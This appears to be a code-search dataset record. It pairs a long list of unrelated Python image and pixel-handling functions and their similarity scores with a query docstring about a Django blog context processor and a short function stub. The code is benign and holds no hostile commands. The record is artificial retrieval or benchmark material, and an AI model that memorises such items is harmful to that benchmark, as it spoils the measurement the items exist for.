colorbar=not labels)\n image = self._png_to_html(self._plt_to_png())\n else:\n return \"<pre>cle.array(\" + str(np.asarray(self)) + \", dtype=\" + str(self.dtype) + \")</pre>\"\n\n\n if size_in_bytes > 1024:\n size_in_bytes = size_in_bytes / 1024\n if size_in_bytes > 1024:\n size_in_bytes = size_in_bytes / 1024\n if size_in_bytes > 1024:\n size_in_bytes = size_in_bytes / 1024\n size = \"{:.1f}\".format(size_in_bytes) + \" GB\"\n else:\n size = \"{:.1f}\".format(size_in_bytes) + \" MB\"\n else:\n size = \"{:.1f}\".format(size_in_bytes) + \" kB\"\n else:\n size = \"{:.1f}\".format(size_in_bytes) + \" B\"\n\n histogram = \"\"\n\n if size_in_bytes < 100 * 1024 * 1024:\n if not labels:\n\n import numpy as np\n from .._tier2 import minimum_of_all_pixels, maximum_of_all_pixels\n from .._tier3 import histogram\n\n num_bins = 32\n\n h = np.asarray(histogram(self, num_bins=num_bins))\n\n plt.figure(figsize=(1.8, 1.2))\n plt.bar(range(0, len(h)), h)\n\n # hide axis text\n # https://stackoverflow.com/questions/2176424/hiding-axis-text-in-matplotlib-plots\n # https://pythonguides.com/matplotlib-remove-tick-labels\n frame1 = plt.gca()\n frame1.axes.xaxis.set_ticklabels([])\n frame1.axes.yaxis.set_ticklabels([])\n plt.tick_params(left=False, bottom=False)\n\n histogram = self._png_to_html(self._plt_to_png())\n\n min_max = \"<tr><td>min</td><td>\" + str(self.min()) + \"</td></tr>\" + \\\n \"<tr><td>max</td><td>\" + str(self.max()) + \"</td></tr>\"\n\n else:\n\n min_max = \"\"\n\n all = [\n \"<table>\",\n \"<tr>\",\n \"<td>\",\n image,\n \"</td>\",\n \"<td style=\\\"text-align: center; vertical-align: top;\\\">\",\n \"<b><a href=\\\"https://github.com/clEsperanto/pyclesperanto_prototype\\\" target=\\\"_blank\\\">cle._</a> image</b><br/>\",\n \"<table>\",\n \"<tr><td>shape</td><td>\" + str(self.shape).replace(\" \", \"&nbsp;\") + \"</td></tr>\",\n \"<tr><td>dtype</td><td>\" + str(self.dtype) + \"</td></tr>\",\n \"<tr><td>size</td><td>\" + size + \"</td></tr>\",\n min_max,\n \"</table>\",\n histogram,\n \"</td>\",\n \"</tr>\",\n \"</table>\",\n ]\n\n return \"\\n\".join(all)", "def render_image(self, arr, order, win_coord):\n self.logger.debug(\"redraw surface\")\n if self.surface is None:\n return\n\n dst_x, dst_y = win_coord[:2]\n\n daht, dawd, depth = arr.shape\n self.logger.debug(\"arr shape is 
%dx%dx%d\" % (dawd, daht, depth))\n\n cr = cairo.Context(self.surface)\n # TODO: is it really necessary to hang on to this context?\n self.cr = cr\n\n # fill surface with background color\n imgwin_wd, imgwin_ht = self.viewer.get_window_size()\n cr.rectangle(0, 0, imgwin_wd, imgwin_ht)\n r, g, b = self.viewer.get_bg()\n cr.set_source_rgba(r, g, b)\n cr.fill()\n\n stride = cairo.ImageSurface.format_stride_for_width(cairo.FORMAT_ARGB32,\n dawd)\n img_surface = cairo.ImageSurface.create_for_data(arr,\n cairo.FORMAT_ARGB32,\n dawd, daht, stride)\n\n cr.set_source_surface(img_surface, dst_x, dst_y)\n cr.set_operator(cairo.OPERATOR_SOURCE)\n\n cr.mask_surface(img_surface, dst_x, dst_y)\n cr.fill()", "def make8UC(mat):\n mat_256 = mat[:,:]# *255\n mat_256.round()\n mat_8UC = np.uint8(mat_256)\n \n return mat_8UC", "def bitmap(arr, dc):\n wiringPy.digital_write(pin_DC, dc)\n wiringPy.digital_write_serial_array(0, struct.pack('B'*len(arr), *arr))", "def _arr_to_img(arr, verbose=False):\n return Image.fromarray(arr)", "def fig2data ( fig ):\n # draw the renderer\n fig.canvas.draw ( )\n buf = np.array(fig.canvas.renderer._renderer)\n return buf", "def save_image(path, array_uint8, coefficient_enlargement=None):\n if array_uint8.dtype != numpy.uint8:\n raise TypeError('`array_uint8.dtype` is not equal to `numpy.uint8`.')\n if coefficient_enlargement is None:\n enlarged_array_uint8 = array_uint8\n else:\n enlarged_array_uint8 = numpy.repeat(numpy.repeat(array_uint8, coefficient_enlargement, axis=0),\n coefficient_enlargement,\n axis=1)\n image = PIL.Image.fromarray(enlarged_array_uint8)\n image.save(path)", "def pixelcode(self):\n\n maxX, maxY = self.size()\n result = bitmap((2*maxX, 2*maxY))\n for x in range(maxX):\n for y in range(maxY):\n pixel = self.get(x,y)\n result.set(2*x,2*y, pixel)\n result.set(2*x,2*y+1, not pixel)\n result.set(2*x+1,2*y, not pixel)\n result.set(2*x+1,2*y+1, pixel)\n return result", "def render(\n xs: np.array,\n ys: np.array,\n x_min: float,\n x_max: float,\n y_min: float,\n y_max: float,\n width: int,\n height: int,\n) -> np.array:\n assert xs.shape == ys.shape\n assert x_max > x_min\n assert y_max > y_min\n assert width > 0\n assert height > 0\n\n x_indices = discretize(np.array(xs), x_min, x_max, steps=width)\n y_indices = discretize(np.array(ys), y_min, y_max, steps=height)\n\n # Invert y direction to optimize for plotting later\n y_indices = (height - 1) - y_indices\n\n # Filter out of view pixels\n xy_indices = np.stack((x_indices, y_indices)).T\n xy_indices = xy_indices[\n (xy_indices[:, 0] >= 0)\n & (xy_indices[:, 0] < width)\n & (xy_indices[:, 1] >= 0)\n & (xy_indices[:, 1] < height)\n ]\n xy_indices = xy_indices.T\n\n # Assemble pixel matrix\n pixels = np.zeros((height, width), dtype=int)\n pixels[xy_indices[1], xy_indices[0]] = 1\n\n return pixels", "def fill_row(self, y, buffer):\n for x in range(0, self._width):\n _rgb_565 = self._colorconverter.convert(self._buffer.getpixel((x, y)))\n buffer[x * 2] = (_rgb_565 >> 8) & 0xFF\n buffer[x * 2 + 1] = _rgb_565 & 0xFF\n return buffer", "def GetRGBArray(self, p_int):\n ...", "def __call__(self, uint8_image, n_upscales=0):\n rects = self._dlib_model(uint8_image, n_upscales)\n return [rect_to_pointgraph(r) for r in rects]", "def muestraPokemon(bytes):\n image = Image.open(io.BytesIO(bytes))\n data = np.array(image)\n plt.imshow(data)\n plt.axis('off')\n plt.show()", "def _tile_image(self, data):\n image = Image.open(StringIO(data))\n return image.convert('RGBA')", "def ret(x):\n color = true_color if x else false_color\n 
return np.tile(color, (SIZE, SIZE, 1)).astype(np.uint8)", "def numpy_to_qimage(np_array: np.ndarray, show_age: bool):\n\n # Only support 2D array of bytes\n assert len(np_array.shape) == 2 and np_array.dtype == np.uint8\n\n width = np_array.shape[1]\n height = np_array.shape[0]\n bytes_per_line = width\n image = QImage(np_array, width, height, bytes_per_line, QImage.Format_Indexed8)\n\n # Maps array values to color\n if show_age:\n image.setColorTable(colors.AGE_COLOR_TABLE)\n else:\n image.setColorTable(colors.BINARY_COLOR_TABLE)\n\n return image", "def convert_image_np(inp):\n inp = inp.numpy().transpose((1, 2, 0))\n inp = (inp*255).astype(np.uint8)\n return inp", "def pixel(self, x: int, y: int, colour: int, /) -> None:", "def render(\n dot_arr: np.ndarray,\n color_arr: Optional[np.ndarray] = None,\n rstrip: bool = True,\n tile: np.ndarray = BRAILLE_TILE,\n) -> str:\n _validate_render_arguments(dot_arr, color_arr)\n\n # Allow conversion for arrays smaller than braille tile\n arr_height, arr_width = dot_arr.shape\n if arr_height < 4 or arr_width < 2:\n pad_right = max(2 - arr_width, 0)\n pad_bottom = max(4 - arr_height, 0)\n\n dot_arr = np.pad(dot_arr, ((0, pad_bottom), (0, pad_right)))\n if color_arr is not None:\n color_arr = np.pad(\n color_arr, ((0, 0), (0, pad_bottom), (0, pad_right), (0, 0))\n )\n arr_height, arr_width = dot_arr.shape\n\n tile_height, tile_width = tile.shape\n\n # Braille tiles must fit over the array without leaving a remainder\n dot_arr = dot_arr[arr_height % tile_height :, arr_width % tile_width :]\n if color_arr is not None:\n color_arr = color_arr[arr_height % 4 :, arr_width % 2 :]\n\n # Divide array(s) into a list of tiles\n tiled_array = split_to_tiles(dot_arr, tile_height, tile_width)\n\n # Clip values of tiles to 0/1 and multiply with `tile`\n masked_bits = np.clip(tiled_array, 0, 1, out=tiled_array) * tile\n\n # New array which contains the sums of each tiles values\n tile_sums = masked_bits.sum(axis=(2, 3)).astype(\n np.int64\n ) # Todo: check if astype is needed\n\n # Add to get the right offset for unicode braille code point\n tile_sums += BRAILLE_CODEPOINT_START\n\n # Join characters to rows, and rows with a linebreak\n if color_arr is None:\n rows = (\n row.astype(\"int32\").view(dtype=f\"U{row.size}\").item() for row in tile_sums\n )\n if rstrip:\n rows_formatted = (line.rstrip(chr(BRAILLE_CODEPOINT_START)) for line in rows)\n else:\n rows_formatted = rows\n return \"\\n\".join(rows_formatted)\n else:\n # If colored array is provided, each color channel is split to tiles, similarly to the gray array.\n # For each braille character there are 3 tiles from separate red, green and blue channels.\n # Averages of a tile from each 3 channels gives 3 values, rgb. Those will be used\n # to create and ANSI escape sequence to give a color to the corresponding braille character.\n colored_tile_means = (\n split_to_tiles(color_arr, tile_height, tile_width)\n .mean(axis=(2, 3))\n .astype(int)\n )\n\n # View the tile sum array as unicode. 
View contains the braille characters\n unicode_buf = tile_sums.view(\"U2\")\n return colorize_view(unicode_buf, colored_tile_means)", "def Array2PIL(a,lut=None,minvalue=None,maxvalue=None,width=None,height=None,\n flip=None):\n import Image # we only need it here ...\n\n if flip==\"ud\": #up-down exchange\n a=a[::-1,:]\n h,w=Numeric.shape(a)\n## a_min=Numeric.minimum.reduce((Numeric.ravel(a)))\n## a_max=Numeric.maximum.reduce((Numeric.ravel(a)))\n a_min=min(Numeric.ravel(a))\n a_max=max(Numeric.ravel(a))\n\n # allow for an user-specified maximal value:\n if maxvalue!=None and maxvalue>a_max:\n a_max=maxvalue\n # allows for an user-specified minimal value:\n if minvalue!=None and minvalue<a_min:\n a_min=minvalue\n\n if lut is not None:\n if len(lut[0]) == 256:\n \n a=(Numeric.ravel(255.0*(a-a_min)/\n (a_max-a_min))).astype(Numeric.UInt8)\n\n rgb=Numeric.zeros( (len(a),3),typecode=Numeric.UInt8)\n\n\n lut_=Numeric.zeros( (3,len(lut[0])),Numeric.UInt8)\n lut_[0]=lut[0].astype(Numeric.UInt8)\n lut_[1]=lut[1].astype(Numeric.UInt8)\n lut_[2]=lut[2].astype(Numeric.UInt8)\n\n # This is much faster than the original zip/ravel variant ...\n rgb[:,0]=Numeric.take(lut_[0],a)\n #print \"rtake\"\n rgb[:,1]=Numeric.take(lut_[1],a)\n #print \"gtake\"\n rgb[:,2]=Numeric.take(lut_[2],a)\n #print \"btake\"\n #rgb=Numeric.ravel(((Numeric.array(zip(r,g,b),\n # typecode=Numeric.UInt8))))\n\n #print \"rgb done\"\n else:\n N = len(lut[0])\n print \"LUT with N=%d entries\" % N\n if N>=256*256:\n print \"UUPS, more than uint16 colors??\", N\n raise ValueError(\"N too large\")\n \n a = (Numeric.ravel((N-1)*(a-a_min)/\n (a_max-a_min))).astype(Numeric.UInt16)\n\n rgb = Numeric.zeros( (len(a), 3), typecode=Numeric.UInt16)\n\n lut_ = Numeric.zeros( (3,len(lut[0])), Numeric.UInt16)\n lut_[0] = lut[0].astype(Numeric.UInt16)\n lut_[1] = lut[1].astype(Numeric.UInt16)\n lut_[2] = lut[2].astype(Numeric.UInt16)\n\n # This is much faster than the original zip/ravel variant ...\n rgb[:,0] = Numeric.take(lut_[0],a)\n rgb[:,1] = Numeric.take(lut_[1],a)\n rgb[:,2] = Numeric.take(lut_[2],a)\n\n rgb = (rgb*256.0/N).astype(Numeric.UInt8)\n\n else: # simple grey scale ramp...\n a=(Numeric.ravel(255.0*(a-a_min)/\n (a_max-a_min))).astype(Numeric.UInt8)\n # convert to (r_0,g_0,b_0,r_1,g_1,b_1,....)\n rgb=Numeric.ravel(Numeric.array(zip(a,a,a)))\n\n # create a PIL RGB image\n #print \"w/h\",w,h\n im=Image.new(\"RGB\",(w,h))\n #print \"imfromstring:\"\n im.fromstring(rgb.tostring())\n #print \"done ...\"\n \n # scale image ?\n if height!=None and width==None:\n im=im.resize(w/h*height,height)\n elif height==None and width!=None:\n im=im.resize(width,h/w*width)\n elif height!=None and width!=None:\n im=im.resize(width,height)\n\n return(im)", "def encode(cls, data):\n t, img = data\n # Cast double time into eight 8-bit integers\n#\t\tta=np.array(binary_cast([t],'d','hhhh'))\n ta = np.array(binary_cast([t], 'd', 'BBBBBBBB'))\n # Cast w,h 16-bit unsigned integers into two unsigned 8-bit integers\n cp = cls.compress(img)\n out = np.concatenate((ta, cp)).astype('B')\n return out", "def getPixel(self,x,y) :\n # check the bounds to make sure we are in the correct area\n if x<0 or x>self.m_width :\n print \"error x out of bounds\\n\"\n return\n if y<0 or y>self.m_height :\n print \"error y our of bounds\\n\"\n return\n # now calculate the index into the 1D array of data\n index=(y*self.m_width*4)+x*4\n # grab the pixels\n red = self.getUcharArrayItem(self.charPixelPtr,index)\n green = self.getUcharArrayItem(self.charPixelPtr,index+1)\n blue = 
self.getUcharArrayItem(self.charPixelPtr,index+2)\n alpha=self.getUcharArrayItem(self.charPixelPtr,index+3)\n return (red,green,blue,alpha)", "def PixbufFromData(self, data):\n loader = gtk.gdk.PixbufLoader()\n loader.write(data)\n loader.close()\n pixbuf = loader.get_pixbuf()\n return pixbuf", "def display(array):\n if isinstance(array, np.ndarray):\n plt.imshow(array)\n plt.show()\n else:\n raise TypeError(\"display() needs a numpy ndarray as parameter, \"\n f\"got {type(array)}\")", "def get_raw(self) -> bytearray:\n img_bytes = bytearray()\n for i in range(self.grid_size[0]):\n if self.grid[i] is not None:\n for j in range(self.grid_size[1]):\n if self.grid[i][j] is not None:\n color = self.grid[i][j]\n color = color.get_byte_representation()\n for k in range(len(color)):\n img_bytes.append(color[k])\n return img_bytes", "def to_nibble_array(arr: ndarray) -> ndarray:\n arr = arr.ravel()\n return (arr[::2] + (arr[1::2] << 4)).astype(\"uint8\")", "def getPixel(data,x,y):\n d0= data[y,x*2]\n \n if ( (d0[0]==255) and (d0[1]==127)):\n return [0.0,0.0,0.0]\n d1= data[y,x*2+1]\n test=_U()\n test.data=(c_ubyte * 6)(d0[0],d0[1],d0[2],d1[0],d1[1],d1[2])\n X=hex (test.DistXYZ.x)\n Y=hex (test.DistXYZ.y)\n Z=hex (test.DistXYZ.z)\n \n X=float(int(X,16)-int(\"0x7FFF\",16))/1000.0\n Y=float(int(Y,16)-int(\"0x7FFF\",16))/1000.0\n Z=float(int(Z,16)-int(\"0x7FFF\",16))/1000.0\n return [X,Y,Z]", "def draw_pixel(x, y, col):\n unicornhathd.set_pixel(x, 12 - y, col[0], col[1], col[2])", "def generate_pixels_8bit(image):\n\n w, h = image.size\n for y in range(h):\n for x in range(w):\n value = pack_argb8(image.getpixel((x, y)))\n yield value\n\n raise StopIteration", "def render_2d_vector(v1, gridsize=50):\n\n fb = pixel_op() \n fb.create_buffer(800, 800)\n fb.graticule(gridsize)\n fb.render_vector_2d( v1, scale=gridsize)\n fb.save('vec.png')", "def display_image ( X ):\r\n\t# on teste que le tableau contient bien 256 valeurs\r\n\tif X.size != 256:\r\n\t\traise ValueError ( \"Les images doivent etre de 16x16 pixels\" )\r\n\r\n\t# on cree une image pour imshow: chaque pixel est un tableau a 3 valeurs\r\n\t# (1 pour chaque canal R,G,B). 
Ces valeurs sont entre 0 et 1\r\n\tY = X / X.max ()\r\n\timg = np.zeros ( ( Y.size, 3 ) )\r\n\tfor i in range ( 3 ):\r\n\t\timg[:,i] = X\r\n\r\n\t# on indique que toutes les images sont de 16x16 pixels\r\n\timg.shape = (16,16,3)\r\n\r\n\t# affichage de l'image\r\n\tplt.imshow( img )\r\n\tplt.show ()", "def _webp(self, tile: bytes) -> np.ndarray:\n decoded = np.rollaxis(imagecodecs.webp_decode(tile), 2, 0)\n return decoded", "def camera_to_pixel(self, X):\n raise NotImplementedError", "def display_image(mat):\n\timg = Image.fromarray(mat)\n\timg.show()", "def visualize_output(\n self,\n img: np.ndarray,\n output_data: Any):\n raise NotImplementedError", "def render_dataset(dataset: np.ndarray, unrendered: np.ndarray, args) -> np.ndarray:\n assert len(unrendered) == len(dataset), 'unrendered and dataset must be of equal size'\n math_mode = '$$'if args.mode == 'equation' else '$'\n os.makedirs(args.out, exist_ok=True)\n # remove successfully rendered equations\n rendered = np.array([int(os.path.basename(img).split('.')[0])\n for img in glob.glob(os.path.join(args.out, '*.png'))])\n valid = [i for i, j in enumerate(unrendered) if j not in rendered]\n # update unrendered and dataset\n dataset = dataset[valid]\n unrendered = unrendered[valid]\n order = np.random.permutation(len(dataset)) if args.shuffle else np.arange(len(dataset))\n faulty = []\n for batch_offset in tqdm(range(0, len(dataset), args.batchsize), desc=\"global batch index\"):\n batch = dataset[order[batch_offset:batch_offset+args.batchsize]]\n #batch = [x for j, x in enumerate(batch) if order[i+j] not in indices]\n if len(batch) == 0:\n continue\n valid_math = np.asarray([[i, \"%s %s %s\" % (math_mode, x, math_mode)] for i, x in enumerate(\n batch) if x != ''], dtype=object) # space used to prevent escape $\n #print('\\n', i, len(math), '\\n'.join(math))\n font = font = np.random.choice(args.font) if len(\n args.font) > 1 else args.font[0]\n dpi = np.random.choice(np.arange(min(args.dpi), max(args.dpi))) if len(\n args.dpi) > 1 else args.dpi[0]\n if len(valid_math) > 0:\n valid_idx, math = valid_math.T\n valid_idx = valid_idx.astype(np.int32)\n try:\n if args.preprocess:\n pngs, error_index = tex2pil(\n math, dpi=dpi, font=font, return_error_index=True)\n else:\n pngs, error_index = Latex(math, dpi=dpi, font=font).write(\n return_bytes=False)\n # error_index not count \"\" line, use valid_idx transfer to real index matching in batch index\n local_error_index = valid_idx[error_index]\n # tranfer in batch index to global batch index\n global_error_index = [\n batch_offset+_ for _ in local_error_index]\n faulty.extend(list(unrendered[order[global_error_index]]))\n except Exception as e:\n print(\"\\n%s\" % e, end='')\n faulty.extend(\n list(unrendered[order[batch_offset:batch_offset+args.batchsize]]))\n continue\n\n for inbatch_idx, order_idx in enumerate(range(batch_offset, batch_offset+args.batchsize)):\n # exclude render failed equations and blank line\n if inbatch_idx in local_error_index or inbatch_idx not in valid_idx:\n continue\n outpath = os.path.join(args.out, '%07d.png' % unrendered[order[order_idx]])\n png_idx = np.where(valid_idx == inbatch_idx)[0][0]\n if args.preprocess:\n try:\n data = np.asarray(pngs[png_idx])\n # print(data.shape)\n # To invert the text to white\n gray = 255*(data[..., 0] < 128).astype(np.uint8)\n white_pixels = np.sum(gray == 255)\n # some png will be whole white, because some equation's syntax is wrong\n # eg.$$ \\mathit { \\Iota \\Kappa \\Lambda \\Mu \\Nu \\Xi \\Omicron \\Pi } $$\n # extract from 
wikipedia english dump file https://dumps.wikimedia.org/enwiki/latest/\n white_percentage = (white_pixels / (gray.shape[0] * gray.shape[1]))\n if white_percentage == 0:\n continue\n # Find all non-zero points (text)\n coords = cv2.findNonZero(gray)\n # Find minimum spanning bounding box\n a, b, w, h = cv2.boundingRect(coords)\n rect = data[b:b+h, a:a+w]\n im = Image.fromarray((255-rect[..., -1]).astype(np.uint8)).convert('L')\n dims = []\n for x in [w, h]:\n div, mod = divmod(x, args.divable)\n dims.append(args.divable*(div + (1 if mod > 0 else 0)))\n padded = Image.new('L', dims, 255)\n padded.paste(im, (0, 0, im.size[0], im.size[1]))\n padded.save(outpath)\n except Exception as e:\n print(e)\n pass\n else:\n shutil.move(pngs[png_idx], outpath)\n # prevent repeat between two error_index and imagemagic error\n faulty = list(set(faulty))\n faulty.sort()\n return np.array(faulty)", "def arr(img_arr, img_wid, img_hei):\n X = torch.Tensor(img_arr).view(-1, 1, img_wid, img_hei)\n X = X/255.0\n return X", "def to_uint8(f):\n from numpy import array, clip, uint8\n\n img = array(clip(f,0,255),uint8)\n return img", "def image_decoder(rawbytes):\n img = Image.open(BytesIO(rawbytes))\n array = np.asarray(img, dtype=np.uint8)\n return array", "def _drawArray(d, data, x, y, scale = 5, color = (255, 255, 255), cCluster = (0, 0, 0)):\n for j in range(data.shape[0]):\n for i in range(data.shape[1]):\n c = (int(color[0] * data[j][i]), int(color[1] * data[j][i]), \\\n int(color[2] * data[j][i]))\n xp = x + scale * i\n yp = y + scale * j\n \n d.rectangle(((xp, yp), (xp + scale - 1, yp + scale - 1)), fill = c)\n \n xp = x + scale * data.shape[1]\n yp = y + scale * j\n d.rectangle(((xp, yp), (xp + scale - 1, yp + scale - 1)), fill = cCluster)", "def bytePlot(f):\n dimensions = getDims(f)\n data = np.array(f)\n data = np.pad(\n data, (0, dimensions[0]-(len(data)%dimensions[0])), 'constant')\n data = np.reshape(data, (-1, dimensions[0]))\n return data", "def putpixel(self, col, row, color=GREEN):\n if col < 0 or row < 0:\n return\n try:\n self.vram[row][col] = color\n except IndexError:\n pass", "def _encode_pixel(color):\n return struct.pack(_ENCODE_PIXEL, color)", "def raw_image(self):\n return self.data16.transpose()", "def pixel(self, x, y):\n \n # Pixel data is unsigned char (8bit unsigned integer),\n # and there are for (blue,green,red,alpha)\n data_format = \"BBBB\"\n \n # Calculate offset, based on\n # http://www.markj.net/iphone-uiimage-pixel-color/\n offset = 4 * ((self.width*int(round(y))) + int(round(x)))\n \n # Unpack data from string into Python'y integers\n b, g, r, a = struct.unpack_from(data_format, self._data, offset=offset)\n \n # Return BGRA as RGBA\n return (r, g, b, a)", "def reshape_pixel_array(self, pixel_arr):\n reshaped_pixel_arr = []\n n = 28\n while n <= len(pixel_arr):\n reshaped_pixel_arr.append(pixel_arr[n-28:n])\n n+=28\n\n return reshaped_pixel_arr", "def pack_argb8(pixel):\n\n r, g, b, a = pixel\n if a == 0:\n value = 0\n else:\n value = (a & 0xc0) | ((r & 0xc0) >> 2) | ((g & 0xc0) >> 4) | ((b & 0xc0) >> 6)\n return value", "def convertNumpy2Image(self, array):\n cv2image = cv2.cvtColor(array, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(image=img)\n return imgtk", "def to_image_space(data):\n return np.swapaxes(np.flip(data, 1), 0, 1)", "def displayData(indices_to_display = None):\n width, height = 20, 20\n nrows, ncols = 10, 10\n if not indices_to_display:\n indices_to_display = random.sample(range(X.shape[0]), nrows*ncols)\n \n 
big_picture = np.zeros((height*nrows,width*ncols))\n \n irow, icol = 0, 0\n for idx in indices_to_display:\n if icol == ncols:\n irow += 1\n icol = 0\n iimg = getDatumImg(X[idx])\n big_picture[irow*height:irow*height+iimg.shape[0], icol*width:icol*width+iimg.shape[1]] = iimg\n icol += 1\n fig = plt.figure(figsize=(6,6))\n\n big_picture = (big_picture * 255).astype(np.int8)\n img = Image.fromarray(big_picture, mode='L')\n plt.imshow(img, cmap = cm.Greys)", "def save_array_as_rgb_image(data, image_name):\n data_dim = len(data.shape)\n if(data_dim == 3):\n assert(data.shape[0] == 3 or data.shape[2] == 3)\n if(data.shape[0] == 3):\n data = np.transpose(data, [1, 2, 0])\n img = Image.fromarray(data)\n img.save(image_name)", "def bytes_to_img(bytes_array):\n stream = BytesIO(bytes_array)\n image = Image.open(stream).convert(\"RGBA\")\n\n return image", "def render_mat(self) -> np.ndarray:\n im = self.image.numpy()[0, :, :, :].astype(np.float)\n cm = self.colormask.astype(np.float)\n out = cv2.addWeighted(cm, 0.35, im, 1 - 0.35, 0)\n out = skimage.img_as_ubyte(out)\n return out", "def _pixel_coord_np(width, height):\n x = np.linspace(0, width - 1, width).astype(np.int32)\n y = np.linspace(0, height - 1, height).astype(np.int32)\n [x, y] = np.meshgrid(x, y)\n return np.vstack((x.flatten(), y.flatten(), np.ones_like(x.flatten())))", "def set_pixel(self, x, y, r, g, b, a):\n\t\t\n\t\ti = 4 * (y * self.width + x)\n\t\tself.buffer[i : i + 4] = array.array('f', struct.pack('ffff', r, g, b, a))", "def interpolate_to_pixel(U, imshape, kind=\"linear\") -> np.ndarray:\n # Velocity components\n u, v = U\n nr, nc = u.shape\n\n ws_x = int(np.round(imshape[0] / nr))\n ws_y = int(np.round(imshape[1] / nc))\n\n x, y = np.arange(nr) * ws_x + ws_x // 2, np.arange(nc) * ws_y + ws_y // 2\n xi, yi = np.arange(imshape[0]), np.arange(imshape[1])\n\n # Interpolate to pixel level\n u_px = scipy.interpolate.interp2d(y, x, u, kind=kind)(yi, xi)\n v_px = scipy.interpolate.interp2d(y, x, v, kind=kind)(yi, xi)\n\n return np.stack((u_px, v_px))", "def _show_numpy(tensor: ndarray, zoom: float = 1.) 
-> None:\n from PIL import Image\n shape = tuple(map(lambda s: round(s * zoom), tensor.shape))\n Image.fromarray(tensor).resize((shape[1], shape[0])).show()", "def one_2_uint8(one_arr):\n assert (one_arr.dtype == 'float' and np.max(one_arr <= 1.0)), \\\n 'improc.one_2_uint8() only accepts floats arrays from 0 to 1.'\n return (255*one_arr).astype('uint8')", "def arr2img(ar):\n return Image.fromstring('L', (ar.shape[1], ar.shape[0]), ar.astype('b').tostring())", "def display_image(np_rgb, text=None, scale_up=False):\n if scale_up:\n np_rgb = np.repeat(np_rgb, slide.SCALE_FACTOR, axis=1)\n np_rgb = np.repeat(np_rgb, slide.SCALE_FACTOR, axis=0)\n\n img_r, img_c, img_ch = np_rgb.shape\n if text is not None:\n np_t = np_text(text)\n t_r, t_c, _ = np_t.shape\n t_i_c = max(t_c, img_c)\n t_i_r = t_r + img_r\n t_i = np.zeros([t_i_r, t_i_c, img_ch], dtype=np.uint8)\n t_i.fill(255)\n t_i[0:t_r, 0:t_c] = np_t\n t_i[t_r:t_r + img_r, 0:img_c] = np_rgb\n np_rgb = t_i\n\n pil_img = util.np_to_pil(np_rgb)\n pil_img.show()", "def processing_data(raw_data):\n data = np.frombuffer(raw_data, np.uint8)\n data = np.reshape(data, [data.shape[0]//1029, -1])\n data = data[:, 5:]\n data = np.reshape(data, [1, -1])\n data = 256 * data[0, 0::2] + data[0, 1::2]\n data = 10 * (data / 65535)\n data = np.reshape(data, [-1, 8]).T\n return data", "def _encode_pixel(self, color):\n return struct.pack(_ENCODE_PIXEL, color)", "def render_image(self, rgbobj, dst_x, dst_y):\n self.logger.debug(\"redraw pixmap=%s\" % (self.pixmap))\n if self.pixmap is None:\n return\n self.logger.debug(\"drawing to pixmap\")\n\n # Prepare array for rendering\n arr = rgbobj.get_array(self.rgb_order, dtype=np.uint8)\n (height, width) = arr.shape[:2]\n\n return self._render_offscreen(self.pixmap, arr, dst_x, dst_y,\n width, height)", "def figure_buffer(self, fig, dpi=180):\n buf = io.BytesIO()\n fig.savefig(buf, format=\"png\", dpi=dpi)\n buf.seek(0)\n img_arr = np.frombuffer(buf.getvalue(), dtype=np.uint8)\n buf.close()\n img = cv2.imdecode(img_arr, 1)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img", "def get_ht1632_data(self, matrix_row, matrix_col):\n start_row = matrix_row * 8\n stop_row = start_row + 8\n start_col = matrix_col * 16\n stop_col = start_col + 16\n return [\n self.pixel(col, row)\n for col in range(start_col, stop_col)\n for row in range(start_row, stop_row)\n ]", "def from_bytes(data):\n\tstream = Gio.MemoryInputStream.new_from_bytes(GLib.Bytes.new(data))\n\tpixbuf = GdkPixbuf.Pixbuf.new_from_stream(stream)\n\treturn pixbuf", "def get_pixels(self):\n\n # pygame board needs to be initialized the first time\n if not self.board:\n self.setup_display(render_gui=False)\n\n self.draw_window(draw_leaderboard=False)\n pixels = pygame.surfarray.array3d(self.window)\n return np.moveaxis(pixels, 1, 0)", "def generate_array_image(R, G, B, height, width):\n R = R.reshape((height, width))\n G = G.reshape((height, width))\n B = B.reshape((height, width))\n \n return np.moveaxis(np.array([R, G, B]), 0, -1)", "def get_pixel(framebuf, x, y):\n index = (y * framebuf.stride + x) * 3\n return (\n (framebuf.buf[index] << 16)\n | (framebuf.buf[index + 1] << 8)\n | framebuf.buf[index + 2]\n )", "def to_uint8(image):\n\tnp.clip(image, 0, 255, out=image)\n\treturn image.astype(np.uint8)", "def get_pixel(framebuf, x, y):\n index = (y * framebuf.stride + x) * 2\n lobyte, hibyte = framebuf.buf[index : index + 2]\n r = hibyte & 0xF8\n g = ((hibyte & 0x07) << 5) | ((lobyte & 0xE0) >> 5)\n b = (lobyte & 0x1F) << 3\n return (r << 16) | (g << 8) | b" ]
[ "0.6824776", "0.6289643", "0.5894268", "0.5886476", "0.58250576", "0.5715473", "0.570549", "0.5702945", "0.5690092", "0.56785333", "0.567429", "0.56699634", "0.56405544", "0.5639835", "0.5638185", "0.562523", "0.56111133", "0.5560625", "0.5559693", "0.5551056", "0.55414987", "0.55404687", "0.5497478", "0.54909956", "0.54908717", "0.5487129", "0.5472244", "0.54575133", "0.54445475", "0.5416843", "0.53842056", "0.5360287", "0.53382057", "0.53333724", "0.5324806", "0.5319079", "0.53135884", "0.52972376", "0.5284001", "0.526344", "0.5256617", "0.5254836", "0.5239072", "0.5238882", "0.52316225", "0.5229748", "0.5219843", "0.52118385", "0.52095634", "0.5203036", "0.5198323", "0.5187384", "0.51754314", "0.51659846", "0.5161304", "0.51577604", "0.5154468", "0.5150978", "0.5147023", "0.5146126", "0.5144532", "0.5108669", "0.51086164", "0.5089184", "0.5086065", "0.50808626", "0.5080299", "0.50797385", "0.5077698", "0.5062006", "0.5049658", "0.5049257", "0.5048506", "0.5044828", "0.50437844", "0.5025942", "0.50256795", "0.5017992", "0.50082237", "0.50060034", "0.50010383", "0.4998211", "0.49882638", "0.49865824", "0.49841192", "0.49837956", "0.49699587", "0.49677193", "0.4961766", "0.49613863", "0.49611038", "0.49400276", "0.49353912", "0.49270174", "0.49241015", "0.49221358", "0.49196392", "0.49190542", "0.49175516", "0.49166167", "0.4913591" ]
0.0
-1
Adds the 5 latest blog posts as `latest_articles`, the 5 latest comments as `latest_comments`, all tags (annotated with a `num_articles` count) as `tags`, and all contributors (annotated the same way) as `contributors` to the context, regardless of the `request`.
def latest_content(request):
    latest_articles = Article.published_articles()[:5]
